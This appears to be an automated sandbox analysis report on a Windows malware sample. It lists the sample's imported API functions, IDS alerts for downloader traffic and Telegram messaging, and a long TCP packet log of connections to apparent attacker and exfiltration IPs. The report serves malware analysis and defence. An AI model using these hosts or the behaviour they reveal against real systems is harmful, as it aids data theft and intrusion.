                                                                                                          USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                          GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                          OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishGreat Britain

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-10T18:46:34.936633+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:36.155345+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:36.756257+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732104.21.64.1443TCP
                                                                                                          2025-01-10T18:46:37.467754+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:38.042437+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449734104.21.64.1443TCP
                                                                                                          2025-01-10T18:46:38.734359+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449735193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:40.664480+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449738104.21.64.1443TCP
                                                                                                          2025-01-10T18:46:41.389629+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449739193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:42.717746+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:47.029383+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449751149.154.167.220443TCP
                                                                                                          2025-01-10T18:46:50.327134+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449754193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:51.280272+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449754193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:51.865598+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449756104.21.64.1443TCP
                                                                                                          2025-01-10T18:46:52.702279+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449757193.122.6.16880TCP
                                                                                                          2025-01-10T18:46:53.603779+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449758104.21.64.1443TCP
                                                                                                          2025-01-10T18:46:56.318091+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449763104.21.64.1443TCP
                                                                                                          2025-01-10T18:46:58.931382+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449767104.21.64.1443TCP
                                                                                                          2025-01-10T18:47:02.653410+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449772149.154.167.220443TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 18:46:34.033596039 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:34.038469076 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:34.038686037 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:34.038968086 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:34.043751001 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:34.673624992 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:34.705295086 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:34.710189104 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:34.893802881 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:34.936633110 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:35.053999901 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.054042101 CET44349731104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.054119110 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.168579102 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.168616056 CET44349731104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.701411009 CET44349731104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.701504946 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.707917929 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.707984924 CET44349731104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.708472013 CET44349731104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.748989105 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.764560938 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.807338953 CET44349731104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.898288965 CET44349731104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.898375034 CET44349731104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.898551941 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.921958923 CET49731443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:35.925177097 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:35.930146933 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.113127947 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.120433092 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.120480061 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.120553017 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.120826006 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.120834112 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.155344963 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.599423885 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.604985952 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.605009079 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.756227970 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.756306887 CET44349732104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.756433964 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.756855965 CET49732443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:36.764527082 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.768656015 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.769526958 CET8049730193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.769610882 CET4973080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.774723053 CET8049733193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:36.774828911 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.774924994 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:36.779661894 CET8049733193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.418919086 CET8049733193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.420329094 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:37.420381069 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.420465946 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:37.420687914 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:37.420700073 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.467753887 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:37.896147013 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:37.908333063 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:37.908369064 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.042459965 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.042532921 CET44349734104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.042589903 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.044351101 CET49734443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.048892021 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.050010920 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.053891897 CET8049733193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.053935051 CET4973380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.055150986 CET8049735193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.055210114 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.055321932 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.060277939 CET8049735193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.733916998 CET8049735193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.734359026 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:38.735586882 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.735622883 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.736121893 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.736121893 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:38.736149073 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.740405083 CET8049735193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:38.740596056 CET4973580192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:39.213536024 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.216315031 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:39.216331005 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.372960091 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.373051882 CET44349736104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.373543024 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:39.373755932 CET49736443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:39.386624098 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:39.391602039 CET8049737193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:39.391707897 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:39.391823053 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:39.396586895 CET8049737193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.040877104 CET8049737193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.042249918 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.042299032 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.042547941 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.042695045 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.042709112 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.092911959 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.507543087 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.537659883 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.537694931 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.664540052 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.664617062 CET44349738104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.664669037 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.678976059 CET49738443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:40.684127092 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.685364962 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.689105988 CET8049737193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.689162016 CET4973780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.690115929 CET8049739193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:40.690172911 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.692640066 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:40.697422028 CET8049739193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.341200113 CET8049739193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.342700005 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.342829943 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.342909098 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.343936920 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.343971014 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.389628887 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:41.824577093 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.826128960 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.826232910 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.994246006 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.994405031 CET44349740104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:41.994462013 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.994781971 CET49740443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:41.997648001 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:41.998707056 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:42.004625082 CET8049739193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.004677057 CET4973980192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:42.005251884 CET8049741193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.005310059 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:42.005754948 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:42.011830091 CET8049741193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.667922974 CET8049741193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.669447899 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:42.669495106 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.669578075 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:42.670131922 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:42.670141935 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:42.717746019 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:43.174418926 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.177290916 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:43.177336931 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.329265118 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.329336882 CET44349742104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.329530954 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:43.353627920 CET49742443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:43.415483952 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:43.420452118 CET8049743193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:43.421163082 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:43.424245119 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:43.428972006 CET8049743193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.079435110 CET8049743193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.080949068 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.080986023 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.081928015 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.082192898 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.082210064 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.123974085 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.535267115 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.537131071 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.537169933 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.680973053 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.681042910 CET44349745104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.681739092 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.682257891 CET49745443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:44.686228991 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.687349081 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.691562891 CET8049743193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.691616058 CET4974380192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.692193031 CET8049747193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:44.692909956 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.693042994 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:44.697907925 CET8049747193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.348901987 CET8049747193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.350446939 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.350497961 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.350569963 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.350907087 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.350917101 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.389602900 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:45.834587097 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.836496115 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.836575031 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.977969885 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.978125095 CET44349749104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:45.978221893 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:45.984787941 CET49749443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:46.141007900 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:46.146394968 CET8049747193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:46.146653891 CET4974780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:46.155514956 CET49751443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:46:46.155564070 CET44349751149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:46:46.155934095 CET49751443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:46:46.157047033 CET49751443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:46:46.157063007 CET44349751149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:46:46.783027887 CET44349751149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:46:46.783101082 CET49751443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:46:46.787220955 CET49751443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:46:46.787242889 CET44349751149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:46:46.787583113 CET44349751149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:46:46.797245979 CET49751443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:46:46.839335918 CET44349751149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:46:47.029395103 CET44349751149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:46:47.029476881 CET44349751149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:46:47.029540062 CET49751443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:46:47.034670115 CET49751443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:46:49.349572897 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:49.354646921 CET8049754193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:49.354713917 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:49.354959965 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:49.359899044 CET8049754193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:50.091666937 CET8049754193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:50.095407963 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:50.100312948 CET8049754193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:50.286128044 CET8049754193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:50.319037914 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:50.319084883 CET44349755104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:50.319164991 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:50.323060989 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:50.323071957 CET44349755104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:50.327133894 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:50.836873055 CET44349755104.21.64.1192.168.2.4
